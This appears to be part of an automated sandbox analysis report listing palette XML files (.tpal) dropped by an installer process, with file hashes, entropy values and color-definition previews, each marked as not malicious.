                                                                  SHA-512:7EF53086C5D838DD2F5D6585FFBE52C06B5AF32EC5B1A721119AA58DEE1181D3D4EE62F83A734264FCD5C043FCEAAF29760DE623B383816B2D273B1CD83236A5
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Browns And Yellows" >. <Color colorName="#bdb76b" alpha="255" />. <Color colorName="#f0e68c" alpha="255" />. <Color colorName="#eee8aa" alpha="255" />. <Color colorName="#fafad2" alpha="255" />. <Color colorName="#ffffe0" alpha="255" />. <Color colorName="#ffff00" alpha="255" />. <Color colorName="#ffd700" alpha="255" />. <Color colorName="#eedd82" alpha="255" />. <Color colorName="#daa520" alpha="255" />. <Color colorName="#b8860b" alpha="255" />. <Color colorName="#bc8f8f" alpha="255" />. <Color colorName="#8b4513" alpha="255" />. <Color colorName="#a0522d" alpha="255" />. <Color colorName="#cd853f" alpha="255" />. <Color colorName="#deb887" alpha="255" />. <Color colorName="#f5f5dc" alpha="255" />. <Color colorName="#f5deb3" alpha="255" />. <Color colorName="#f4a460" alpha="255" />. <Color colorName="#d2b48c" alpha="255" />. <Color colorName="#d2691e" alpha="255" />. <Color colorName="#ffa500" alpha="255" />. <Co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Caramel.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.516595588414972
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8DYdnffnqF/m8vNA8OpuOojY7Ji6bdblCoqg86LCP5+4:98vqFJwujjY7JiublCw86i+4
                                                                  MD5:0CE40760E381E5049A723E79F88669D0
                                                                  SHA1:033B51FF18D470E7BF244CC89F0FF03E7CEF238C
                                                                  SHA-256:7FCBFEB0E28EAF8B1D0A506CEB729B6725AA2ABA551B797C0380BBCFE10A4AC4
                                                                  SHA-512:9D8C31FC5AB58F7714BB8D6A3A59B5F52B8AA9C35B96925191B5C479B565028C480DEC5C737FC25C782E168E9CDD0E4F60053F634D0BED2336ABA8E133F0AF38
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Caramel" >. <Color colorName="#303030" alpha="255" />. <Color colorName="#a488c0" alpha="255" />. <Color colorName="#ac8cc0" alpha="255" />. <Color colorName="#b490c0" alpha="255" />. <Color colorName="#bc94c0" alpha="255" />. <Color colorName="#c498c0" alpha="255" />. <Color colorName="#cc98c0" alpha="255" />. <Color colorName="#d49cc0" alpha="255" />. <Color colorName="#dca0c0" alpha="255" />. <Color colorName="#e4a4c0" alpha="255" />. <Color colorName="#eca8c0" alpha="255" />. <Color colorName="#e4a0bc" alpha="255" />. <Color colorName="#d894b8" alpha="255" />. <Color colorName="#cc88b4" alpha="255" />. <Color colorName="#c07cb0" alpha="255" />. <Color colorName="#b470a8" alpha="255" />. <Color colorName="#a868a4" alpha="255" />. <Color colorName="#9c5ca0" alpha="255" />. <Color colorName="#90509c" alpha="255" />. <Color colorName="#844498" alpha="255" />. <Color colorName="#783890" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Cascade.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.517294231791309
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8bKovLmpFtVe/+++Hmmfss6WWsAD333+qGG86:9bKkLyn3ss6WWsAD333M6
                                                                  MD5:8F4FD0FB6EBA0E036B26DFBCA377F0B1
                                                                  SHA1:2D834A27497795BF3474CB699782360720EA3025
                                                                  SHA-256:3604874BADAD549B7680006F4ACF15C0DD1B96939D0233538FA849C794172606
                                                                  SHA-512:B93B7611273B68E7ACB53EC2ACF331197BAB7DAF9028B9133082EB1ADDB4A02FBFF5E634B4CEAC61F15E290991C2486C2B36EB87AD1CFC40087F90090A7A5703
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Cascade" >. <Color colorName="#6c5880" alpha="255" />. <Color colorName="#6c5880" alpha="255" />. <Color colorName="#6c5880" alpha="255" />. <Color colorName="#685c84" alpha="255" />. <Color colorName="#685c84" alpha="255" />. <Color colorName="#645c84" alpha="255" />. <Color colorName="#605c84" alpha="255" />. <Color colorName="#606088" alpha="255" />. <Color colorName="#5c6088" alpha="255" />. <Color colorName="#5c6088" alpha="255" />. <Color colorName="#586088" alpha="255" />. <Color colorName="#54648c" alpha="255" />. <Color colorName="#54648c" alpha="255" />. <Color colorName="#50648c" alpha="255" />. <Color colorName="#4c6088" alpha="255" />. <Color colorName="#50648c" alpha="255" />. <Color colorName="#546890" alpha="255" />. <Color colorName="#586894" alpha="255" />. <Color colorName="#5c6c94" alpha="255" />. <Color colorName="#607098" alpha="255" />. <Color colorName="#64709c" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\China.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.5436058428416395
                                                                  Encrypted:false
                                                                  SSDEEP:96:91wuESUTQNNNNttK444Ut7Ou8saS4pvSsLDGxOW:91wGf07WSLR
                                                                  MD5:293CEE28AA8E6D993D1302ACE9370E38
                                                                  SHA1:0D02602435FB8C4AD1CF48FBF179B26186505F6B
                                                                  SHA-256:2ACE81250383F6E244713D2F318570AA28871CF70D076428D80BA6627139E046
                                                                  SHA-512:EAD9F4F61E8E62A04E235EE948B130E68B4EF7FE7287C24D3D596213A72B9CB828D21150926B3FF3376C21E7F13E0E2D1248A971079356F70B42BFFBCC66A2F4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="China" >. <Color colorName="#e04cf0" alpha="255" />. <Color colorName="#e04cf0" alpha="255" />. <Color colorName="#e050f0" alpha="255" />. <Color colorName="#e054f0" alpha="255" />. <Color colorName="#e458f0" alpha="255" />. <Color colorName="#e45cf0" alpha="255" />. <Color colorName="#e460f0" alpha="255" />. <Color colorName="#e460f0" alpha="255" />. <Color colorName="#e464f0" alpha="255" />. <Color colorName="#e468f0" alpha="255" />. <Color colorName="#e46cf0" alpha="255" />. <Color colorName="#e870f0" alpha="255" />. <Color colorName="#e874f0" alpha="255" />. <Color colorName="#e878f0" alpha="255" />. <Color colorName="#e878f0" alpha="255" />. <Color colorName="#e87cf0" alpha="255" />. <Color colorName="#e880f0" alpha="255" />. <Color colorName="#e884f0" alpha="255" />. <Color colorName="#e888f0" alpha="255" />. <Color colorName="#ec8cf0" alpha="255" />. <Color colorName="#ec8cf0" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Coldfire.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11102
                                                                  Entropy (8bit):4.522402394593415
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8mvK/6xwQZEl9m4vkUYQHHqmu4KK22UldeaHN:9adxovkU9HY
                                                                  MD5:D448BB01E8902429F2BEF222C53D28A0
                                                                  SHA1:07453AEE1FA4B522AD9BCA7B0E2FC4A1518E5EEF
                                                                  SHA-256:10C7AAC4EAB5958928539E841A1842BEA8BA8209D5EA0B174F384CB23BB7E714
                                                                  SHA-512:83C09B8A1A71B5BC7FE0B32A73110CFD8D0D72F72D5047BAEDF2C4C93F91205FCCA5A99446D5366527755FC02DADBDCC59B2DC1275B6A2D511D348716B5D4C2D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Coldfire" >. <Color colorName="#00acfc" alpha="255" />. <Color colorName="#00acfc" alpha="255" />. <Color colorName="#00acfc" alpha="255" />. <Color colorName="#00a8fc" alpha="255" />. <Color colorName="#00a4fc" alpha="255" />. <Color colorName="#00a0fc" alpha="255" />. <Color colorName="#009cfc" alpha="255" />. <Color colorName="#0098fc" alpha="255" />. <Color colorName="#0098fc" alpha="255" />. <Color colorName="#0094fc" alpha="255" />. <Color colorName="#0090fc" alpha="255" />. <Color colorName="#008cfc" alpha="255" />. <Color colorName="#0088fc" alpha="255" />. <Color colorName="#0084fc" alpha="255" />. <Color colorName="#0084fc" alpha="255" />. <Color colorName="#0080fc" alpha="255" />. <Color colorName="#007cfc" alpha="255" />. <Color colorName="#0078fc" alpha="255" />. <Color colorName="#0074fc" alpha="255" />. <Color colorName="#0070fc" alpha="255" />. <Color colorName="#0070fc" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\CoolColors.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):441
                                                                  Entropy (8bit):4.778302988981003
                                                                  Encrypted:false
                                                                  SSDEEP:12:TMHd89y/eFahgerwgegnhgeygewgemge5geMWhhg:2d89y/SaquNFnqg+QRB9
                                                                  MD5:0117B756BA1ADF57FC7174E4CA129F9B
                                                                  SHA1:73991BF7AB90C93C83C253459A96F09C3A8A30B6
                                                                  SHA-256:8EAC6B815D8592CA469F73EA7EB135A59CB1D01240341BD2B25122C078EF7969
                                                                  SHA-512:BE410F4AC8086FDCBB7AFAFCBC14972EB9A7FEBB7697EC5F0E7554D2403E9B928ECF999BB1CCC6EC0255D0C978D9EA6E602296435C1CB20B130022CE560EF343
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Cool Colors" >. <Color colorName="#112ac6" alpha="255" />. <Color colorName="#539be2" alpha="255" />. <Color colorName="#161066" alpha="255" />. <Color colorName="#40234c" alpha="255" />. <Color colorName="#073f93" alpha="255" />. <Color colorName="#2c6ccc" alpha="255" />. <Color colorName="#265121" alpha="255" />. <Color colorName="#04422c" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Cranes.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.529756828731143
                                                                  Encrypted:false
                                                                  SSDEEP:96:9DKeijz3LRWCfy9eXS29C/v6bSiZdPsbZun:9DKeOLwsThC/vijPgZun
                                                                  MD5:965513CD3FAECC248B9BD74826973763
                                                                  SHA1:00EB93C95A11ED6F454AB4FA7E1A91710C85BD49
                                                                  SHA-256:EFC578E3ACD95A1A02B4256EFAE6B667B57F89FFA8802CBD0FC76158BCFE3C3B
                                                                  SHA-512:7417ECDF4FD22E6A8C2C19D370CE3BDCAC16340CF39B19274F778D684BA32CC4172F737BDD14DF8991C50AB20E9BD94FB1C15A406673BD2440D65C5BA2BF2C68
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Cranes" >. <Color colorName="#080808" alpha="255" />. <Color colorName="#c0b090" alpha="255" />. <Color colorName="#c0a480" alpha="255" />. <Color colorName="#504844" alpha="255" />. <Color colorName="#708c58" alpha="255" />. <Color colorName="#688460" alpha="255" />. <Color colorName="#5c6854" alpha="255" />. <Color colorName="#18080c" alpha="255" />. <Color colorName="#606c5c" alpha="255" />. <Color colorName="#80684c" alpha="255" />. <Color colorName="#2c1c18" alpha="255" />. <Color colorName="#9c8c74" alpha="255" />. <Color colorName="#9c9474" alpha="255" />. <Color colorName="#44443c" alpha="255" />. <Color colorName="#d4c494" alpha="255" />. <Color colorName="#90886c" alpha="255" />. <Color colorName="#a09480" alpha="255" />. <Color colorName="#d8dcd8" alpha="255" />. <Color colorName="#2c1c28" alpha="255" />. <Color colorName="#440c10" alpha="255" />. <Color colorName="#0c0820" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Darkpastels.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11106
                                                                  Entropy (8bit):4.520954509267113
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8tJXTREE1xQSN+3aX5TNZsU2bRERvvQVPttl+lIofeWfgqzmGfHRII:9XTPcKJNZWbRE2+lIoGWgqzBv
                                                                  MD5:7DD9866633CE45F76060C588E030465B
                                                                  SHA1:93976533A4B005FC12A96113738EF75A15761DB9
                                                                  SHA-256:FC9E858A9B4DC26C25C345C91AF753F0B60998F5041EFE4A1FEC63979A5B8AF9
                                                                  SHA-512:04285509F540E047DC21D89E95D4608385C80BF3C207A4CE3AE3E17AC5AEB7DE7EDA6D4E679C16F0F44C810539A8BF6962DE1E89DB20DB10056554DC123A3DB6
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Dark pastels" >. <Color colorName="#3868b8" alpha="255" />. <Color colorName="#3468b4" alpha="255" />. <Color colorName="#3468b4" alpha="255" />. <Color colorName="#3468b0" alpha="255" />. <Color colorName="#3468b0" alpha="255" />. <Color colorName="#3068ac" alpha="255" />. <Color colorName="#3068ac" alpha="255" />. <Color colorName="#3064a8" alpha="255" />. <Color colorName="#3064a8" alpha="255" />. <Color colorName="#2c64a4" alpha="255" />. <Color colorName="#2c64a4" alpha="255" />. <Color colorName="#2c64a4" alpha="255" />. <Color colorName="#2c64a0" alpha="255" />. <Color colorName="#2c64a0" alpha="255" />. <Color colorName="#28649c" alpha="255" />. <Color colorName="#28649c" alpha="255" />. <Color colorName="#286098" alpha="255" />. <Color colorName="#286098" alpha="255" />. <Color colorName="#246094" alpha="255" />. <Color colorName="#246094" alpha="255" />. <Color colorName="#246090" alpha="255" />. <Color co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Default.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):7844
                                                                  Entropy (8bit):4.635293636307541
                                                                  Encrypted:false
                                                                  SSDEEP:48:c86EXoQn/Yd/TQ6zXB6F29/TfdvgK6Dw4yECGwk:962r/YVEkh3awCZl
                                                                  MD5:9E2FD870F0AA02E4F83CE0CD84A6D1B1
                                                                  SHA1:0F6EA68107C4FCD6E071F78CDF4074DAC126FBE2
                                                                  SHA-256:364FEF379510A503BA894521456CAEDACA07E6897997DC647F6BEC34736C7C3B
                                                                  SHA-512:08BC5B7CA976B2E2D7C9194CADB51E303E3627FF6F6055958E1D5ABF888D679FA279343A388792FD0C24E5E1CF87D01E896542CE665C7B0F3567771B492BA38A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Default Palette" >. Row 0 -->. <Color colorName="#ea0003" alpha="255" />. <Color colorName="#cc1294" alpha="255" />. <Color colorName="#990099" alpha="255" />. <Color colorName="#2408dd" alpha="255" />. <Color colorName="#0067ce" alpha="255" />. <Color colorName="#003663" alpha="255" />. <Color colorName="#005b7b" alpha="255" />. <Color colorName="#005952" alpha="255" />. <Color colorName="#005826" alpha="255" />. <Color colorName="#005e20" alpha="255" />. <Color colorName="#406618" alpha="255" />. <Color colorName="#827b00" alpha="255" />. <Color colorName="#7d4900" alpha="255" />. <Color colorName="#7b2e00" alpha="255" />. <Color colorName="#790000" alpha="255" />. <Color colorName="#7a0026" alpha="255" />. Row 1 -->. <Color colorName="#ff171a" alpha="255" />. <Color colorName="#e814a9" alpha="255" />. <Color colorName="#930d93" alpha="255" />. <Color colorName="#361cff" alpha="255" />. <Color colorName=
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Ega.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):10409
                                                                  Entropy (8bit):4.404098133451595
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8+KKVG0v/+Hpf+19h0L3TKKVG0v/+Hpf+19h0L3TKKVG0v/+Hpf+19h0L3TKKJ:c83iiiiiiiiiiiiii3
                                                                  MD5:F0FA14A067634EAB20068E39683FE4B9
                                                                  SHA1:B371614418D57E2E0BDCEAAA65E31868EE2CBB4A
                                                                  SHA-256:05133D0E4128B2A15DAF6A1C98A71D1578934C02B1ADE5AEC1C24318486EC600
                                                                  SHA-512:AFDEF18AC9BD9B6760A23C96062F77B7C14EC67C34513A3DBED77A86FC730B8C1360991A3EAF90A41FC43F922C466A45387992419EFA27D0C1936EFD43378496
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Ega" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#a800a8" alpha="255" />. <Color colorName="#fc5454" alpha="255" />. <Color colorName="#fc54a8" alpha="255" />. <Color colorName="#fc54fc" alpha="255" />. <Color colorName="#fca8fc" alpha="255" />. <Color colorName="#fcfc00" alpha="255" />. <Color colorName="#fcfca8" alpha="255" />. <Color colorName="#fcfcfc" alpha="255" />. <Color colorName="#a8fcfc" alpha="255" />. <Color colorName="#00fcfc" alpha="255" />. <Color colorName="#54a8fc" alpha="255" />. <Color colorName="#0000fc" alpha="255" />. <Color colorName="#0054a8" alpha="255" />. <Color colorName="#000054" alpha="255" />. <Color colorName="#545454" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#a800a8" alpha="255" />. <Color colorName="#fc5454" alpha="255" />. <Color colorName="#fc54a8" alpha="255" />. <Color colorName="#fc54fc" alpha="255" />. <Color colorName="
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Firecode.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11102
                                                                  Entropy (8bit):4.466369461275854
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8gGTMs3/4+plYPFawx9VXDZZZZ5MwUUQwalbaN:9fl3/4+p+PFawx9FZZZZ5t
                                                                  MD5:0B35D57AB8DF8F1D8E5C76CF9293F427
                                                                  SHA1:AEC01875BBAA8EBBE7A8EE7AA49B694A4B21AA4B
                                                                  SHA-256:1F6E201FB810FB2860A5E39ECE07344BAABA0BF8D79F597D3026B5E716716B0E
                                                                  SHA-512:648817DCE5E9721BFC6082AA6E72E830D4F4CDECA35299577B10A30A230A0500A4122C306ABACA018B22E09C2B11B9DCFC192AFC74306B05976AA0CBB4865125
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Firecode" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#00001c" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000024" alpha="255" />. <Color colorName="#000028" alpha="255" />. <Color colorName="#080028" alpha="255" />. <Color colorName="#100024" alpha="255" />. <Color colorName="#180024" alpha="255" />. <Color colorName="#200020" alpha="255" />. <Color colorName="#28001c" alpha="255" />. <Color colorName="#30001c" alpha="255" />. <Color colorName="#380018" alpha="255" />. <Color colorName="#400014" alpha="255" />. <Color colorName="#480014" alpha="255" />. <Color colorName="#500010" alpha="255" />. <Color colorName="#580010" alpha="255" />. <Color colorName="#60000c" alpha="255" />. <Color colorName="#680008" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Gold.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11098
                                                                  Entropy (8bit):4.482834229821559
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8ulntN1hdL4jwBhhhuaaamQQQX111yiii1:9ulnDBhhhuaaamQQQj
                                                                  MD5:7977E01B76DB83866358B2B41322C15F
                                                                  SHA1:DCCE15C205F55D57BF4BB8D0BE9191773E7B8B6F
                                                                  SHA-256:88C2044553D083F0C61349F5F0A07B31EDD8CE09F1CE72AF3863835DFB69BC7C
                                                                  SHA-512:D087A7C58040224BB5433A825D63DDCBBDC61D8D6CF97A06EEA0EB259FB5D6FE738B5DEFEBD6B14A977BC49B9C70DB0F8EC6DB3371B5961E603A88EF68D3B890
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Gold" >. <Color colorName="#fcfc80" alpha="255" />. <Color colorName="#fcfc80" alpha="255" />. <Color colorName="#fcf87c" alpha="255" />. <Color colorName="#fcf87c" alpha="255" />. <Color colorName="#fcf478" alpha="255" />. <Color colorName="#f8f478" alpha="255" />. <Color colorName="#f8f074" alpha="255" />. <Color colorName="#f8f070" alpha="255" />. <Color colorName="#f8ec70" alpha="255" />. <Color colorName="#f4ec6c" alpha="255" />. <Color colorName="#f4e86c" alpha="255" />. <Color colorName="#f4e868" alpha="255" />. <Color colorName="#f4e468" alpha="255" />. <Color colorName="#f0e464" alpha="255" />. <Color colorName="#f0e060" alpha="255" />. <Color colorName="#f0e060" alpha="255" />. <Color colorName="#f0dc5c" alpha="255" />. <Color colorName="#ecdc5c" alpha="255" />. <Color colorName="#ecd858" alpha="255" />. <Color colorName="#ecd854" alpha="255" />. <Color colorName="#ecd454" alpha="255" />. <Color colorName=
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\GrayViolet.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11104
                                                                  Entropy (8bit):4.5402144827643705
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8uSLtvw3VcClq4m24gygvJWb4qNWmk+sH5mlg3nwntPmYYOjOrG1UpM:9jvwlcClqMgoZmwnUQlOjOrG1UpM
                                                                  MD5:E1C4FC5A5F9CF9AE8505662465102BF0
                                                                  SHA1:545CDE2EEEDF122AA4F48C72A583207AD6E7431E
                                                                  SHA-256:6EAE7D2BF9A9407D53425DE940A727A0E0E2F79C5D445A7FAF71BA1853ED1A06
                                                                  SHA-512:2FA2F41AE044AEEEA2D4B1CAADD9696B043C4EDC571A0EF719A46DEF78022EFAFA3BA485CD0BF6BA1D4897AAD13583A6C4A8B9BFC2342AA20D6F00DF5AF227B7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="GrayViolet" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#040404" alpha="255" />. <Color colorName="#040404" alpha="255" />. <Color colorName="#080808" alpha="255" />. <Color colorName="#080808" alpha="255" />. <Color colorName="#0c0c0c" alpha="255" />. <Color colorName="#0c0c0c" alpha="255" />. <Color colorName="#101010" alpha="255" />. <Color colorName="#101010" alpha="255" />. <Color colorName="#141414" alpha="255" />. <Color colorName="#141414" alpha="255" />. <Color colorName="#141818" alpha="255" />. <Color colorName="#181818" alpha="255" />. <Color colorName="#181c1c" alpha="255" />. <Color colorName="#1c1c1c" alpha="255" />. <Color colorName="#1c2020" alpha="255" />. <Color colorName="#202020" alpha="255" />. <Color colorName="#202024" alpha="255" />. <Color colorName="#242424" alpha="255" />. <Color colorName="#242428" alpha="255" />. <Color colo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Grayblue.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11102
                                                                  Entropy (8bit):4.510794721838206
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8EzBsigWoNmmc3hIggg2YSrSrSrSqttNWS4444c3x11oSSSyyyOOslGmmmbBBw:92BgWoAMeeeqttwx118mmmE
                                                                  MD5:C91880ADED9B78732A397979BEC65E2D
                                                                  SHA1:A01B99311DD1E6A47E204B85239DB5B75FE0CED9
                                                                  SHA-256:B4192C468E0F217FAF1553E7B4F66746B8443AADEFE187A11F4363144FF368CF
                                                                  SHA-512:DA92F840ABCFB60A719AF9BC804CE1BF26EF638FE4A7A835546821324FD48911FEEBAE478F4719104079BD38E399AA7C114CD4C4897BA9BC0254D24C462B31C6
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Grayblue" >. <Color colorName="#7ca480" alpha="255" />. <Color colorName="#7ca480" alpha="255" />. <Color colorName="#7ca47c" alpha="255" />. <Color colorName="#7ca07c" alpha="255" />. <Color colorName="#7ca07c" alpha="255" />. <Color colorName="#78a07c" alpha="255" />. <Color colorName="#78a07c" alpha="255" />. <Color colorName="#789c7c" alpha="255" />. <Color colorName="#789c7c" alpha="255" />. <Color colorName="#789c78" alpha="255" />. <Color colorName="#749c78" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709074" alpha="255" />. <Color colorName="#6c9074" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Grays.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1424
                                                                  Entropy (8bit):4.637437827073644
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8p1kqYeqC7+qP53qYMq/xqUt+qVUyqe+0MpqUIAOqKz+qwtL+qRnnqq+0Ypqvj:c8pGCCqq+e
                                                                  MD5:6D1133FBC427F3DA6A9C55EF7E2D7F58
                                                                  SHA1:EF743865A9FF382D2F3821505CA255CBA76CE9A6
                                                                  SHA-256:E3E4A67D02E7436F6A6C9905598A706E33FD2EBAD4FF935FA22DB9711B150405
                                                                  SHA-512:8FC006CE578B37083C219086B5C5ACC66069AF0A1375EF726741BD41389AF5A9372CA2BB4B8B26FDE74C0A7456E7F1AD59369ECE5BE26625DF562BC62353E49B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Grays" >. <Color colorName="#070707" alpha="255" />. <Color colorName="#0f0f0f" alpha="255" />. <Color colorName="#171717" alpha="255" />. <Color colorName="#1f1f1f" alpha="255" />. <Color colorName="#272727" alpha="255" />. <Color colorName="#2f2f2f" alpha="255" />. <Color colorName="#373737" alpha="255" />. <Color colorName="#3f3f3f" alpha="255" />. <Color colorName="#474747" alpha="255" />. <Color colorName="#4f4f4f" alpha="255" />. <Color colorName="#575757" alpha="255" />. <Color colorName="#5f5f5f" alpha="255" />. <Color colorName="#676767" alpha="255" />. <Color colorName="#6f6f6f" alpha="255" />. <Color colorName="#777777" alpha="255" />. <Color colorName="#7f7f7f" alpha="255" />. <Color colorName="#878787" alpha="255" />. <Color colorName="#8f8f8f" alpha="255" />. <Color colorName="#979797" alpha="255" />. <Color colorName="#9f9f9f" alpha="255" />. <Color colorName="#a7a7a7" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\Greens.tpal (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.462825236322438
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8GFFpU3JZqjKEJ3c1ZlboQSUEHHvtNbZixjZa:90iX+Hvncw
                                                                  MD5:98FFBC8069263E57999786204EBCBE86
                                                                  SHA1:B1BABEB3E7554716EFC305E40BC04DC4B9C4357B
                                                                  SHA-256:EC87139E70B4B4FDD070DF210FC671F2CC85395ACC8CD2177B3D05BC2E253BAA
                                                                  SHA-512:AFBB9D8707361DAAC0631C3039A00BB7F0827464C6BC30440D45D2FEBB4DDD003587330900D38A47A49EDA9C30C328246E9F4C4F9FA8DE8FA423EFDE05D60CC7
                                                                  Malicious:false
                                                                  Reputation:unknown
